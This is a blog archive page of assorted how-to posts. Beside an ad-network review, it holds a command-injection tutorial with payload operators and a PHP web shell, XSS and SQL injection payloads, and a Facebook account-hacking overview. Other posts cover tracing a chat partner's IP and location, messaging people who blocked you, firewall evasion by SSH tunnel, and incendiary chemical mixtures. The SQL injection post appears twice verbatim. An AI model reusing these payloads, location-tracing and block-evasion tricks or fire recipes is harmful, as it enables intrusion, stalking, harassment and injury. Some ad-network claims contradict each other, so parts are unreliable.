29/06/2016

Earn online money

Earn Money With BidVertiser Alternative Adsense
BidVertiser is one of the popular advertisement network created by Bpath Company in 2003. It is a targeted Pay per Click advertising outlet and privately owned by the management team.

BidVertiser best adsense alternative for every site and it is a great and vast option for those who have been banned from adsense.It is a honest review about Bidvertiser best adsense ppc ad newtwork. Bidvertiser is great in the reality that not only do they PPC pay per click but also on conversions too, means that you have dual chance to make income, one from clicks and the second from conversions, it also can lead to a healthy income stream.

BidVertiser Best Adsense Alternative PPC ad network

Bidvertiser best Adsense alternative, and it can used in conjunction with Adsense. You can observe some of the Bidvertiser Ad is similar to Adsense but you can customize these ads to amend that. As compared to Adsense for PPC rate, Bidvertiser offer you the opportunity to get a decent income with the toolbar with a lower pay out rate than Google Adsense PPC. It’s meant to increase with time the longer you linked with Bidvertiser. Bidvertiser alternative of google adsense because it’s provide you the way if you are facing problem by Google adsense you can easily convert to Bidvertiser and continue your online business.



However, there are some differences between adsense and Bidvertiser on a comparison stage, going to mention below their differences:

  • Bidvertsers Sign up process is very easy as compared to Adsense sign up Process. 
  • Fill rate of BidVertiser is approximately 100% but the fill rate of Adsense is 100%. 
  • Bidvertisers quality of ads isn’t very good but it has different ads type which is good for it, Adsense quality of ads are best. 
  • BidVertiser PPC is good but not the best and the Adsense PPC is best there is no doubt and questions on it. 
  • Bidvertiser minimum payout is only 10$ and it has payment method, Paypal, Check, Wire Transfer. Western Union while Adsense minimum payout is 100$ and the payment method is Check only.

How Bidvertiser works:

  1. Register for an account
  2. Secondly create and place your ads relevant websites.
  3. Run your ad on Bidvertser’s PPC-Pay per click advertising network to start getting new targeted prospects with in very less time. 
  4. Advertisers set their Bids for Ads to be displayed in Blogs or Websites of some particular category or niche.
  5. Bidvertiser checks category of Publisher’s website or blog and displays the top or highest bidders on his/her site. 
  6. When visitors click Bidvertiser ads, publishers earn money, they have a double chance if click turns into conversion.
  7. Advertisers get traffic and lead their business, on the other hand Publishers get paid for the area they allow at the end of the month. 

Available Advertisement Formats and Tools:

Bidvertiser provides several Ad formats for the advertisement to use and get the best combination, such as:

Slider Ads: Using slide Ads can increase earnings because these ads will display to the visitors sliding from bottom to top with having close button above the ad. Not recommended for highly professional websites.

Pop Under Ads: These ads are shown only once per 24 hours per user behind the active browser window, not recommended for professional websites.
XML Feeds: XML feeds can use to display ads across web apps such as Domain Parking, In-Text, Web Search, Toolbar search results.

Bidvertiser for Advertisers:

Bidvertiser best adsense alternative means a great alternative to Adwords if you are searching for a good value pay-per click option.
  • Many ad formats available 
  • You may design your own ads. 
  • Select the genuine websites that will show your ads from a categorized directory. 
  • Promte your Ebay listings. 
  • Geo-trading available. 
  • You have to commit to $5 every day campaign budget for each ad, however the unspent amount rolls over to be utilized for the following day.

How to Earn More Money from BidVertiser:

There is no particular way to making money from Bidvertiser because Bidvertiser is a Pay Per Click Network, but here going to share some tips and tricks those are really useful for receiving more clicks and you can earn more money with the same traffic you are receiving on your blog.

Below Title of the Blog Post:
For getting more clicks one of the best place is putting ads below blog post title, the reason is almost 99% readers of your blog must see that place, it means the advertiser company displaying ads relevant to your blog post content then you get more chance of clicks.

At the Bottom of the Blog Post:
One more good area where the eyes of the readers move on about to 80% is at the bottom of the blog post, here if readers of your blog posts see the related ads on this place, and the ads are according to readers choice than your click rate would be much higher.

In Side Bar Area:
The reader’s attention on the side bar is about 60% times, it is also good opportunity for you, if you add promoting affiliate products in this area than you can get clicks and most of the time it will give you the best result.

In Between the Blog Post:
This is the amazing place to place code of ads network, it is because if you are presenting great and best content in your blog post then it may cause of getting more traffic is much more and more traffic as compared to more click. This area is 100% in the reader’s attention area, they see your ads means a golden way to catch more clicks.




Top 10 Points About Bidvertiser Ad Network:

Bidvertiser best adsens alternative due to its some leading points which make it more easy and workable, here is top 10 positive points about Bidvertiser Ad Network.

1. Bidvertiser Ad Network has very fast approval process.
2. Bidvertiser is one of the oldest advertising networks.
3. Its installation of code is very easy and you find wide variety of sizes in option to choose.
4. Through Paypal your maximum payment is 10$ but 100$ through cheque.
5. More than 56k websites or blog are linked to Bidvertiser.
6. Bidvertiser Alexa rank is best.
7. Monthly payment process and more special is Bidvertiser is legit network.
8. Through your blog, bonus for getting more conversion rate.
9. Disable of account is quite rare.
10. PPC Pay Per Click is sometimes more than 2$.

You can choose Bidvertser if:

  • If you are banned from Adsense or you are having approval problem.
  • If you have new blog or website.
  • If you have wix, warez or siterubix site.
  • If you have hosted at a sub-domain.
  • If you want to make money from your blog.
  • If you want to use an additional money for your sites expenses.


Overview Bidvertiser

Make money from clicks and conversions
You get paid for every visitor that clicks on an ad, and an extra revenue if the click turns into conversion. Our goal is to enable you to make as much as possible from your advertising space, by letting advertisers bid on your ad space. We pay monthly, either by check, wire or instantly through PayPal with a minimum of only $10

Always have the highest bidders displayed on your website
BidVertiser will always display the highest bidders on your site, assuring the maximum revenue possible at any given time.

Have your bidding steadily improved over time
You will see a constant improvement in your bidding over time, as both your visitors and our advertisers will be exposed to the opportunity of bidding against each other on your ad space.

Customize the layout of your ads
BidVertiser gives you a simple point-and-click tool to help you customize the layout of the ads to fit your site's look and feel, in order to retain the high quality of your website.

Generate detailed reports to monitor your ads performance
Use the Publisher Center to generate detailed online reports to monitor your ads performance, including the number of page impressions, clicks, click-through rate, and the total amount you've earned.





 
Final Words
Bidvertiser is a good legit network , you can make money online from your websites or blogs, if you are still not using it then start using it, because it will help you to make money from your advertising networks, Bidvertiser provide variety of ad formats with good payment.

05/05/2016

Trace Facebook Friends Location While Chatting

Trace Unknown Facebook Users Location While Chatting
There are many reasons you want to know the facebook users location. For example you received a message from an unknown person to whom you have never interacted before. I do not believe what facebook users timeline looks like. Here is a cool and simple way to trace any friend on facebook. It’s the most useful facebook trick. If You have unknown friends in your facebook account and then after some time, you believe that he/she is a fake person then with the help of this facebook tricks you can trace their actual location. I often accept many unknown friend requests. One day, a facebook friend of mine started commenting on my posts badly and when i looked at his timeline i found England as his current city then i started a research in this regard. Finally i came to know about his Geolocation along with his ISP.
Here are the steps how to reveal facebook friends location.
First of all you have to find the IP address of a spacific user.
To Do so we will be using netstat command in windows. Just invite or ping him for a chat. As soon as you start the chat, open Command Prompt (cmd) from your PC and click Start > Run > cmd.
Note: Before trying this make sure you close all the other tabs in your browser and keep only facebook tab open also clear the history and cache from your browser.
1. Now the next step that you have to do for this facebook trick; open the command prompt and type netstat -an and hit enter key.
And you will get all established connections IP addresses there. Note down all the suspicious IP Addresses.
2. The other step is to trace IP address that have you found from step 1.
3. Go to IP Location Finder -Geolocation where you will see your own IP Address, delete it and paste the IP address of your friend in the given box and click Query button.
Now It will show you all the information about that user including his ISP and Location. Use this trick only if you are in a problem with some unknown friends.

21/02/2015

How to send facebook messages to those who have blocked you

Did you know that its really possible to send the message to the person who has blocked you on Facebook. To your surprise,YES IT IS.
With the increased popularity of facebook, facebook has made this really. Either Call it one of the flaws of facebook or the relaxation given to the people who have just got blocked by someone but still want to maintain the conversation with him/her.
Facebook never closes any option completely. It always lefts an undisclosed alternative for everything. You just have to find that alternative.Today I am bringing one such brilliant alternative to you.

How to Send the Message

For sending the message, all your friends "facebook username" of the person who has blocked you. Obviously, if the person has blocked you, you won't be able to visit his/her profile. But finding the facebook username is really a cakewalk. you can make a new account to find the username or better you can simply ask any of your friend just to tell you the person's facebook username. Once you know the username, You just need to open your email account whether it is associated to your facebook account or not. Sending the message using email is as simple as sending a normal mail to anybody. In the "To" section ,you have to add the person's facebook username. For example your facebook friend have username john.el. So you need to type your friend's username in "To" section but remember don't forget to add @facebook.com after username (john.el@facebook.com) leave subject body empty and then type your message in message body after that click send message and you are done.

How to send facebook messages to those who have blocked you

After you send the email, the message will arrive in the person's facebook message box in the folder named Other and he/she will be able to read out your message like other normal messages he/she receives.
Note: That person won't be able to reply to your messages but will see an immediate option to unblock you and continue the conversation with you. In order to be able to reply you, He/She must follow the same procedure as discussed above.So doing this, you can really increase your chances of getting back in touch with the person whom you have lost the contact with or atleast you can convey your message to the person who doesn't even want to talk to you anymore.

09/01/2015

Make Chemical Fire Without Matches or a Lighter

Make Chemical Fire Without Matches or a Lighter
Learn four ways to make fire using chemical reactions. No matches or lighter are needed to start the fire.
1. Chemical Fire
*. Potassium permanganate
*. Glycerin
*. Water
Add a few drops of glycerin to a few crystals of potassium permanganate. Accelerate the reaction by adding a couple of drops of water.
2. Chemical Fire
*. Acetone
*. Sulfuric acid
*. Potassium permanganate
Soak a tissue with acetone to make it more flammable. Draw sulfuric acid into a glass pipette. Dip the pipette into potassium permanganate so that the tip of the pipette is coated with a few crystals. Dispense the sulfuric acid onto the tissue. The potassium permangante and sulfuric acid mix to produce manganese heptoxide and fire.
3. Chemical Fire
*. Sodium chlorate
*. Sugar
*. Sulfuric acid
Mix a small amount of sodium chlorate and sugar. Initiate the reaction by adding a few drops of sulfuric acid.
4. Chemical Fire
*. Ammonium nitrate powder
*. Finely ground zinc powder
*. Hydrochloric acid
Mix together a small amount of ammonium nitrateand zinc powder. Initiate the reaction by adding a few drops of hydrochloric acid.
Chemical Fire Safety
If you are performing a demonstration of chemical fire using any of these reactions, use very small amounts of the chemicals listed for each project. Wear proper safety gear and work on a fire-safe surface.

08/01/2015

Make Fireballs You Can Hold in Your Hand

Make Fireballs You Can Hold in Your Hand
Fire is made up of light and heated gases from combustion. You can control the temperature of fire by selecting a fuel that burns with a cool flame. If you pour the fuel onto a substance that won't burn, you can make a fireball that you can hold in your hand or juggle. Here are written instructions for making your own handheld fireballs.

Materials Needed to Make Fireballs
*. 2" x 5" strip of cotton cloth (like from a t-shirt)
*. 100% cotton thread.
*. Needle
*. Naphtha lighter fluid (e.g. Ronsonol™)
*. Match or lighter

How to Make a Fireball
*. Thread the needle with cotton thread.
*. Tightly roll the cotton strip into a ball.
*. Pierce the ball with the needle and wrap the ball with the thread.
End by running the needle through the ball one more time and break off the thread.
*. Soak the ball with lighter fluid. Don't soak your hands.
*. Don't ignite the the fireball while you are holding it. Set the ball on a fire-proof surface.
*. If you want to hold the fireball, my recommendation is to pick it up with tongs and carefully/slowly set it on your hand. That way you'll be able to tell if you can take the heat or not. Once you gain some confidence, you can pick the fireball up using your fingers.
*. It's best to use 100% cotton fabric and thread. If the fiber is synthetic (like nylon or polyester) it might burn or melt, with unpleasant consequences.
*. The 'trick' to this demonstration is the fuel. It needs to be naphtha or kerosene. I have had good luck with Ronsonol™ and Zippo™ (not the butane stuff read your ingredient list). Rubbing alcohol (isopropyl alcohol) works, but it burns a little hotter.
*. It's pretty hard to blow the fireball out. You either need to blow hard or else suffocate the flame to extinguish it. You can set a saucepan lid over the fireball.
*. The fireballs are reusable. Put them out when they run out of fuel or else the cotton will burn (you can tell this is happening when the ball starts to blacken and produce sooty smoke). If you get to the point where the cotton itself is burning, the fireball will be too hot to hold. Ideally you want to extinguish the fireball before it consumes all of its fuel. Simply soak it in more lighter fluid and relight it to reuse it.
*. Regarding holding these in your hand or doing tricks with them. The cone of the flame is hot, especially above the ball, however, the fuel burns at a relatively low temperature. The flashpoint of Ronsonol™ brand of naphtha is 6°C or 43° F, with combustion mainly around 400°F. To put that in perspective, touching the fireball is a lot like touching a hot pizza right out of the oven (except without the sticky cheese part).
Fireballs are great fun to make, but like all fire projects, use proper safety precautions and common sense. Don't get burned or set your house or yard on fire. This is a project which requires adult supervision.

29/12/2014

How to Perform Command Injection Attacks

Command injection tutorial
Introduction: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
How to Perform Command Injection Attacks
In this artick, we will talk about the varieties of command injections and how they can be executed. There are a variety of ways to inject shell commands. Assume for a moment that you have found the page, which takes as an argument a filename as input and executes the shell command "cat" against that file. For example, a semicolon was used to separate out one command form another, to indicate that after the cat command completed, another function should be called in the same line. There are a number of ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators
Examples: $, &&, ||
These operators perform some logical operation against the data before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired:
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the target file with the output of the previous command
< target_file - send contents of target_file to the previous command
- operator - Add additional operations to target command
These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.
Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:
<?php
echo
shell_exec('cat '.$_GET[
'command']);
?>
Thus, it should be noted that many types of attacks, including SQL Injection, have shell injection as an end primary goal to gaining control of the server.

27/12/2014

Top 10 Facebook Hacking Techniques

Top 10 Facebook hacking techniques
There are many ways break into a Facebook account, and we have collected the 10 most usual techniques.

1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials. Some Auto liker websites are good examples of phishing. They ask a user to login for access token in order to get username and password of the victim. [Beware]

2. Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers
Almost 80% people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are softwares specially designed to capture the saved passwords stored in the victims Internet browser.

4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying softwares are: Mobile Spy and Spy Phone Gold.

7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attack
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets
Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

25/12/2014

HTML Code Injection Technique

HTML code injection techniques
Introduction: This article is about HTML injection techniques used to exploit web site vulnerabilities. Nowadays, it's not usual to find a completely vulnerable site to this type of attacks, but only one is enough to exploit it. I'll make a compilation of these techniques all together, in order to facilitate the reading and to make it entertaining. HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at client side. Otherwise, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on this, like injection, complements the nomenclature of 'codeinjection'.

Code Injection
This type of attack is possible by the way the client browser has the ability to interpret scripts embedded within HTMLcontent enabled by default, so if an attacker embeds script tags such <SCRIPT> , <OBJECT> , <APPLET> , or <EMBED> into a web site, the web browser's JavaScript engine will execute it. Typical targets of this type of injection are forums, guestbooks, or whatever section where the administrator allows the insertion of text comments; if the design of the web site isn't parsing the comments inserted, and takes < or > as real chars, a malicious user could type:
I like this site because <script>alert('Injected!');</script> teaches me a lot
If it works and you can see the message box, the door is opened to the attacker's imagination limits! A common code insertion used to drive navigation to another website is something like this:
<H1> Vulnerability test </H1> <METAHTTP-EQUIV="refresh"CONTENT="1;url= http://www.test.com">
Same within a
<FK> or <LI> tag:
<FKSTYLE="behavior: url(http://<<Other website>> ;">
Other tags used to execute malicious JavaScript code are, for example, <BR> , <DIV> , even background-image:
<BRSIZE="&{alert('Injected')}"><DIVSTYLE="background-image: url(javascript:alert('Injected'))">
The <title> tag is a common weak point if it's generated dynamically. For example, suppose this situation:
<HTML>
<HEAD>
<TITLE>
<?php
echo$_GET['titulo']; ?</TITLE> </HEAD> <BODY> > ...
</BODY>
</HTML>
If you build title as 'example </title> </head> </body><img src= http://myImage.png>' HTML resulting would insert the 'myImage.png' image first of all:
<HTML>
<HEAD>
<TITLE>
example
</TITLE>
</HEAD>
<BODY><imgsrc= http://myImage.png></TITLE> </HEAD> <BODY>...
</BODY>
</HTML>
There is another dangerous HTML tag that could exploit a web browser's frames support characteristic: <IFRAME> This tag allows (within Sandbox security layer) cross-scripting exploiting using web browser elements (address bar or bookmarks, for example), but this theme is outside the scope of this article.

24/12/2014

SSH Tunnel Tutorial

SSH Tunnel Tutorial
Introduction: A SSH tunnel consists of an encrypted tunnel created through a SSH protocol connection. A SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example we can use a ssh tunnel to securely transfer files between a FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibits or filter certain internet services. For example an organization will block certain sites using their proxy filter. But users may not wish to have their web traffic monitored or blocked by the organization proxy filter. If users can connect to an external SSH server, they can create a SSH tunnel to forward a given port on their local machine to port 80 on remote web-server via the external SSH server.
This ssh tunnel tutorial will deliberately bypass a firewall, and security admins will frown (at the very least) on you bypassing a corporate firewall. How to encrypt anything over SSH tunnel using a Socks Proxy.
*. How to Browse Securely from hotspots or hide from corporate firewalls/sniffers.

SSH Tunnel Summary
Using an ssh server that has internet access as a browsing point, you will create an ssh tunnel from your local PC to a remote server. Source all of your traffic from it, and encrypt communications to it using free software. This tutorial will show you how to setup an SSH Tunnel and use this to create aSocks Proxy. Requires an SSH account anywhere even your home PC with cygwin or ubuntu installed. You could then use this to tunnel from an unsafe place and browse as if you were at the safe, remote location instead. This is free.

SSH Tunnel Instructions
1. Find your current IP Go to whatismyip.com, look at your existing IP, without proxy.
Reason: compare later when we have a tunnel.
2. Packet Capture
Th: !(ipv6.dst == ff02::1) && !(ipv6.dst == ff02::c) && !stp && !cdp && !dtp && !dhcpv6 && !arp && !nbns && !browser && !icmpv6 && !ip.src== 192.168.1.105 &&
Reason: verify that you are truly encrypted. This filter just hides network chatter. It’s the same thing a snooper would see. your filter may be different, or not required. I was on a chatty network when I inspected and thought this example would be worth showing.
3. Setup Putty for SSH Tunnel:
*. Session: user@ yourserver.com:22
*. Connection > SSH: V2, Enable Compresion
*. Connection > SSH > Tunnels > Source: 7070, Dynamic, ADD
*. Session: Save, Open or, create an SSH tunnel via command line:
ssh -D 7070 -p 22 user@ yourserver.com sleep 9999
Reason: sets up loopback port (7070) on your local PC and connects over port 22 to the remote shell
4. Setup Firefox to encrypt to use the tunnel:
*. Tools > Options > Network > Settings > Manual
*. Socks: 127.0.0.1: 7070
*. Click OK.
5. Setup Firefox to use Remote DNS
about:config network.proxy.socks_remote_dns=true
Reason: By default, your local PC will do the DNS by default, but that will show what websites you are going to, so this steps ends DNS over the ssh tunnel.
6. Restart Browser
Reason: configures firefox to route traffic through the tunnel you just made
7. Test
*. View everything is over port 22
*. View IP is different from whatismyip.com
*. View filter in wireshark: dns, there should be no entries.
References
*. https://addons.mozilla.org /en-US/thunderbird /user/323/(foxyproxy allows quick proxy swaps in mozilla,thunderbird, etc).
*. ftp://ftp.chiark.greenend.o rg.uk/users/sgtatham/putty-latest/x86/putty.exe
*. http://www.wireshark.org/download.html

SSH Tunnel NOT SAFE
Is all browsing now encrypted? No, it’s only encrypted to the remote server. From that point on it’s normal. Though if you were browsing an https connection without cookies, it’s pretty hard to figure out what your traffic is. Cookies are relatively simple to capture, sniff then replay for a man in the middle type attack or privileged login.

22/12/2014

SQL Injection: SQL for Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: UserId: 105 or 1=1 Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1 The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName"); uPass = getRequestString("UserPass"); sql = "SELECT * FROM Users WHERE Name ='" uName "' AND Pass ='" uPass "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this: Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statement, separated by semicolon. Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this: Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner. ASP.NET Razor Example
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = @0"; db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed. Another Example
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples The following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId"); sql = "SELECT * FROM Customers WHERE CustomerId = @0"; command = new SqlCommand(sql); command.Parameters.AddWithValue("@0",txtUserID); command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; command = new SqlCommand(txtSQL); command.Parameters.AddWithValue("@0",txtNam); command.Parameters.AddWithValue("@1",txtAdd); command.Parameters.AddWithValue("@2",txtCit); command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)"); $stmt->bindParam(':nam', $txtNam); $stmt->bindParam(':add', $txtAdd); $stmt->bindParam(':cit', $txtCit); $stmt->execute();


SQL Injection: SQL in Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: UserId: 105 or 1=1 Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1 The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True
Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName"); uPass = getRequestString("UserPass"); sql = "SELECT * FROM Users WHERE Name ='" uName "' AND Pass ='" uPass "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this: Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements
Most databases support batched SQL statement, separated by semicolon. Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this: Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection
Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner. ASP.NET Razor Example
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = @0"; db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed. Another Example
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples The following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId"); sql = "SELECT * FROM Customers WHERE CustomerId = @0"; command = new SqlCommand(sql); command.Parameters.AddWithValue("@0",txtUserID); command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; command = new SqlCommand(txtSQL); command.Parameters.AddWithValue("@0",txtNam); command.Parameters.AddWithValue("@1",txtAdd); command.Parameters.AddWithValue("@2",txtCit); command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)"); $stmt->bindParam(':nam', $txtNam); $stmt->bindParam(':add', $txtAdd); $stmt->bindParam(':cit', $txtCit); $stmt->execute();


21/12/2014

How To Extract All Hyperlinks In A Web Page

How To Extract All Hyperlinks In A Web Page
Sometimes you might need to have the all the hyperlinks from a webpage. For example if you are a developer you might be in need of a JavaScript or CSS of a webpage that is hosted externally. Sometimes this trick will also help you extract the download link from survey sites. Whatever might be the reason let us learn to do this. We will learn three different ways to extract hyperlinks from a webpage in this post.

Extract Hyperlinks From A Webpage In Chrome

